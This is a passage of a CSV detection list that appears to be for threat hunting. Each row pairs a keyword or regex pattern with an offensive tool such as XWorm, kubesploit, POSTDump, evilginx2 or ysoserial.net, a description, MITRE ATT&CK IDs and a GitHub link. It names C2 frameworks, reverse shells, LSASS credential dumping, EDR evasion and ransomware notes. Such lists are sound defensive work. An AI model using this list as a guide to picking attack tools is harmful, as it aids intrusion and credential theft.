It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*XSStrike*",".{0,1000}XSStrike.{0,1000}","offensive_tool_keyword","XSStrike","Advanced XSS detection and exploitation suite.","T1189","TA0001","N/A","N/A","Exploitation tools","https://github.com/UltimateHackers/XSStrike","1","0","N/A","N/A","10","12717","1843","2024-03-22T10:38:50Z","2017-06-26T07:24:44Z" "*xsukax-Wordlist-All.7z*",".{0,1000}xsukax\-Wordlist\-All\.7z.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","4","367","37","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z" "*xvt-void/EnableAllTokenPrivs*",".{0,1000}xvt\-void\/EnableAllTokenPrivs.{0,1000}","offensive_tool_keyword","EnableAllTokenPrivs","Enable or Disable TokenPrivilege(s)","T1134 - T1055","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/xvt-void/EnableAllTokenPrivs","1","1","N/A","7","1","11","3","2024-02-18T20:55:05Z","2024-02-17T15:39:25Z" "*XWorm_RAT_V2._1.data.*",".{0,1000}XWorm_RAT_V2\._1\.data\..{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*XWorm-v5-Remote-Access-Tool*",".{0,1000}XWorm\-v5\-Remote\-Access\-Tool.{0,1000}","offensive_tool_keyword","Rhadamanthys","Fake Xworm - Rhadamanthys infostealer","T1583 - T1110 - T1082 - T1505 - T1567 - 
T1573","TA0006 - TA0003 - TA0004 - TA0005 - TA0009","N/A","N/A","malware","https://github.com/koyaxZ/XWorm-v5-Remote-Access-Tool","1","1","N/A","10","1","21","10","2023-10-03T01:34:12Z","2023-10-03T01:27:37Z" "*XXEinjector*",".{0,1000}XXEinjector.{0,1000}","offensive_tool_keyword","XXEinjector","XXEinjector automates retrieving files using direct and out of band methods. Directory listing only works in Java applications. Bruteforcing method needs to be used for other applications.","T1573.001 - T1573.002 - T1574","TA0007 - ","N/A","N/A","Web Attacks","https://github.com/enjoiz/XXEinjector","1","1","N/A","10","10","1436","304","2020-08-27T12:33:26Z","2015-05-16T10:56:14Z" "*xxePayloads.ini*",".{0,1000}xxePayloads\.ini.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","10","979","159","2024-05-01T19:11:32Z","2020-06-06T20:17:55Z" "*XX-PHISHING-LINK-XX*",".{0,1000}XX\-PHISHING\-LINK\-XX.{0,1000}","offensive_tool_keyword","bitb","Browser templates for Browser In The Browser (BITB) attack","T1056.001 - T1134 - T1090","TA0005 - TA0006 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/mrd0x/BITB","1","0","N/A","10","10","2726","467","2024-01-26T05:20:18Z","2022-03-15T16:51:39Z" "*X-YSOSERIAL-NET*",".{0,1000}X\-YSOSERIAL\-NET.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","3026","460","2023-10-17T12:27:23Z","2017-09-18T17:48:08Z" "*xZF7fvaGD6p2yeLyf9i7O9gBBHk05B0u*",".{0,1000}xZF7fvaGD6p2yeLyf9i7O9gBBHk05B0u.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in 
Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","0","N/A","10","10","1077","109","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*xzfbmR6MskR8J6Zr58RrhMc325kejLJE*",".{0,1000}xzfbmR6MskR8J6Zr58RrhMc325kejLJE.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use them with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*Y29iYWx0c3RyaWtl*",".{0,1000}Y29iYWx0c3RyaWtl.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing.
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*Y2F0Y2hldHVtYm90aWZ5b3VjYW4-*",".{0,1000}Y2F0Y2hldHVtYm90aWZ5b3VjYW4\-.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*yanncam/ShuckNT*",".{0,1000}yanncam\/ShuckNT.{0,1000}","offensive_tool_keyword","ShuckNT","ShuckNT is the script of Shuck.sh online service for on-premise use. 
It is designed to downgrade - convert - dissect and shuck authentication tokens based on Data Encryption Standard (DES)","T1552.001 - T1555.003 - T1078.003","TA0006 - TA0002 - TA0040","N/A","N/A","Credential Access","https://github.com/yanncam/ShuckNT","1","1","N/A","10","1","60","9","2023-10-11T13:50:11Z","2023-01-27T07:52:47Z" "*YaraFilters*lsassdump.yar*",".{0,1000}YaraFilters.{0,1000}lsassdump\.yar.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","256","50","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" "*yarrick/iodine*",".{0,1000}yarrick\/iodine.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","1","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*yasserbdj96/hiphp*",".{0,1000}yasserbdj96\/hiphp.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files.
It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","1","N/A","10","10","194","39","2024-04-18T11:55:55Z","2021-04-05T20:29:57Z" "*yasserjanah/CVE-2020-5902*",".{0,1000}yasserjanah\/CVE\-2020\-5902.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/yasserjanah/CVE-2020-5902","1","1","N/A","N/A","1","40","14","2023-05-22T23:32:39Z","2020-07-06T01:12:23Z" "*YaWNdpwplLwycqWQDCyruhAFsYjWjnBA*",".{0,1000}YaWNdpwplLwycqWQDCyruhAFsYjWjnBA.{0,1000}","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","1","N/A","10","10","767","224","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z" "*Yaxser/Backstab*",".{0,1000}Yaxser\/Backstab.{0,1000}","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1107 - T1106 - T1543.004 ","TA0002 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/Yaxser/Backstab","1","1","N/A","N/A","10","1309","231","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z" "*Yay! 
No SYSMON here!*",".{0,1000}Yay!\sNo\sSYSMON\shere!.{0,1000}","offensive_tool_keyword","sysmonquiet","RDLL for Cobalt Strike beacon to silence Sysmon process","T1055 - T1055.012 - T1063","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ScriptIdiot/SysmonQuiet","1","0","N/A","N/A","1","84","16","2022-09-09T12:28:15Z","2022-07-11T14:17:34Z" "*yck1509/ConfuserEx*",".{0,1000}yck1509\/ConfuserEx.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","1","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*YDHCUI/csload.net*",".{0,1000}YDHCUI\/csload\.net.{0,1000}","offensive_tool_keyword","cobaltstrike","A cobaltstrike shellcode loader - past domestic mainstream antivirus software","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/YDHCUI/csload.net","1","1","N/A","10","10","122","14","2021-05-21T02:36:03Z","2021-05-20T08:24:16Z" "*YDHCUI/manjusaka*",".{0,1000}YDHCUI\/manjusaka.{0,1000}","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","10","10","747","140","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z" "*yeelight_discover.py*",".{0,1000}yeelight_discover\.py.{0,1000}","offensive_tool_keyword","red-python-scripts","random networking exploitation scripts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","8","10","1952","1596","2024-01-11T16:11:28Z","2021-01-07T16:11:52Z" "*yehia-mamdouh/Shell3er*",".{0,1000}yehia\-mamdouh\/Shell3er.{0,1000}","offensive_tool_keyword","Shell3er","PowerShell Reverse Shell","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - 
TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/Shell3er","1","1","N/A","9","10","59","12","2023-05-07T16:02:41Z","2023-05-07T15:35:16Z" "*yehia-mamdouh/var0xshell*",".{0,1000}yehia\-mamdouh\/var0xshell.{0,1000}","offensive_tool_keyword","var0xshell","var0xshell - shell with xor encryption","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/var0xshell/tree/main","1","1","N/A","8","10","3","1","2023-01-09T06:53:42Z","2023-01-08T21:34:26Z" "*Yh0Js82rIfFEbS6pR7oUkN0Use54pIZBa3fpYprAMuURNrZZGc6cM8dc+AC*",".{0,1000}Yh0Js82rIfFEbS6pR7oUkN0Use54pIZBa3fpYprAMuURNrZZGc6cM8dc\+AC.{0,1000}","offensive_tool_keyword","demiguise","The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. 
and (if you use environmental keying) to avoid it being sandboxed.","T1564 - T1071.001 - T1071.004 - T1059 - T1070","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/nccgroup/demiguise","1","0","N/A","9","10","1344","253","2022-11-09T08:12:25Z","2017-07-26T08:56:15Z" "*Yml0c3kubWl0LmVkdQ==*",".{0,1000}Yml0c3kubWl0LmVkdQ\=\=.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*YmpwZW5uaXNhbmF3ZXNvbWVmaWdodGVy*",".{0,1000}YmpwZW5uaXNhbmF3ZXNvbWVmaWdodGVy.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*YmxvY2s9MTAw*",".{0,1000}YmxvY2s9MTAw.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*yogeshojha/rengine*",".{0,1000}yogeshojha\/rengine.{0,1000}","offensive_tool_keyword","rengine","reNgine is an automated reconnaissance framework for web applications with a focus on highly configurable streamlined recon process via Engines recon data correlation and organization continuous monitoring backed by a database and simple yet intuitive User Interface. 
reNgine makes it easy for penetration testers to gather reconnaissance with","T1595 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/yogeshojha/rengine","1","1","N/A","N/A","10","6762","1047","2024-04-30T22:17:19Z","2020-05-03T12:13:12Z" "*yolAbejyiejuvnup=Evjtgvsh5okmkAvj*",".{0,1000}yolAbejyiejuvnup\=Evjtgvsh5okmkAvj.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise - rule author: Elastic Security - link: https://raw.githubusercontent.com/elastic/protections-artifacts/main/yara/rules/Linux_Trojan_XZBackdoor.yar","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://www.openwall.com/lists/oss-security/2024/03/29/4","1","0","rule author: Elastic Security - link: https://raw.githubusercontent.com/elastic/protections-artifacts/main/yara/rules/Linux_Trojan_XZBackdoor.yar","10","10","N/A","N/A","N/A","N/A" "*YOLOP0wn/POSTDump*",".{0,1000}YOLOP0wn\/POSTDump.{0,1000}","offensive_tool_keyword","POSTDump","Another tool to perform minidump of LSASS process using few technics to avoid detection.","T1003 - T1055 - T1562.001 - T1218","TA0005 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","1","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*YOLOP0wn/POSTDump*",".{0,1000}YOLOP0wn\/POSTDump.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","1","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*YOLOP0wn/POSTDump*",".{0,1000}YOLOP0wn\/POSTDump.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection.","T1003.001 - T1055 - T1564.001","TA0005 - TA0006","N/A","N/A","Credential 
Access","https://github.com/YOLOP0wn/POSTDump","1","1","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*You are trying to target a User Group Policy Object while running the embedded SMB server*",".{0,1000}You\sare\strying\sto\starget\sa\sUser\sGroup\sPolicy\sObject\swhile\srunning\sthe\sembedded\sSMB\sserver.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/synacktiv/GPOddity","1","0","N/A","9","3","246","21","2023-10-14T16:06:34Z","2023-09-01T08:13:25Z" "*You can execute commands in this shell :D*",".{0,1000}You\scan\sexecute\scommands\sin\sthis\sshell\s\:D.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","N/A","10","10","1925","344","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z" "*you cannot run the RogueOxidResolver on 127.0.0.1*",".{0,1000}you\scannot\srun\sthe\sRogueOxidResolver\son\s127\.0\.0\.1.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","N/A","10","10","1281","200","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z" "*You do not have sufficient permission to hide the scheduled task*",".{0,1000}You\sdo\snot\shave\ssufficient\spermission\sto\shide\sthe\sscheduled\stask.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 T1570 T1021 T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","0","N/A","9","4","311","41","2022-07-05T10:24:45Z","2021-10-12T15:27:32Z" "*you need to provide the 
path to directory where your phishlets are stored:*",".{0,1000}you\sneed\sto\sprovide\sthe\spath\sto\sdirectory\swhere\syour\sphishlets\sare\sstored\:.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/kgretzky/evilginx2","1","0","N/A","10","10","9938","1813","2024-05-01T02:57:08Z","2018-07-10T09:59:52Z" "*You_spin_me__round.ino*",".{0,1000}You_spin_me__round\.ino.{0,1000}","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interface device ( HID attacks ). Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","137","60","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" "*youcantpatchthis*",".{0,1000}youcantpatchthis.{0,1000}","offensive_tool_keyword","cobaltstrike","Example code for using named pipe output with beacon ReflectiveDLLs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - 
Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rxwx/cs-rdll-ipc-example","1","0","N/A","10","10","107","25","2020-06-24T19:47:35Z","2020-06-24T19:43:56Z" "*youhacker55/PayGen*",".{0,1000}youhacker55\/PayGen.{0,1000}","offensive_tool_keyword","PayGen","FUD metasploit Persistence RAT","T1587 T1048 T1588 T1102 T1041","N/A","N/A","N/A","RAT","https://github.com/youhacker55/PayGen","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Your Moms Smart Vibrator*",".{0,1000}Your\sMoms\sSmart\sVibrator.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","user-agent","10","10","936","137","2024-04-22T08:06:07Z","2020-09-06T23:02:37Z" "*YOUR_FILES_ARE_ENCRYPTED.HTML*",".{0,1000}YOUR_FILES_ARE_ENCRYPTED\.HTML.{0,1000}","offensive_tool_keyword","SunCrypt","SunCrypt ransomware","T1486 - T1490","TA0040","N/A","N/A","Ransomware","https://github.com/rivitna/Malware","1","0","#yara","10","3","261","38","2024-05-01T19:21:20Z","2021-07-28T21:00:52Z" "*Yourman.sh Mini Shell*",".{0,1000}Yourman\.sh\sMini\sShell.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","php title webshell","7","10","1967","343","2024-05-01T05:24:28Z","2020-05-13T11:28:52Z" "*ysoserial -*",".{0,1000}ysoserial\s\-.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation 
Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","3026","460","2023-10-17T12:27:23Z","2017-09-18T17:48:08Z" "*ysoserial-*.zip",".{0,1000}ysoserial\-.{0,1000}\.zip","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","3026","460","2023-10-17T12:27:23Z","2017-09-18T17:48:08Z" "*ysoserial.exe *",".{0,1000}ysoserial\.exe\s.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","3026","460","2023-10-17T12:27:23Z","2017-09-18T17:48:08Z" "*ysoserial.exe*",".{0,1000}ysoserial\.exe.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","1","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*ysoserial.exe*",".{0,1000}ysoserial\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - 
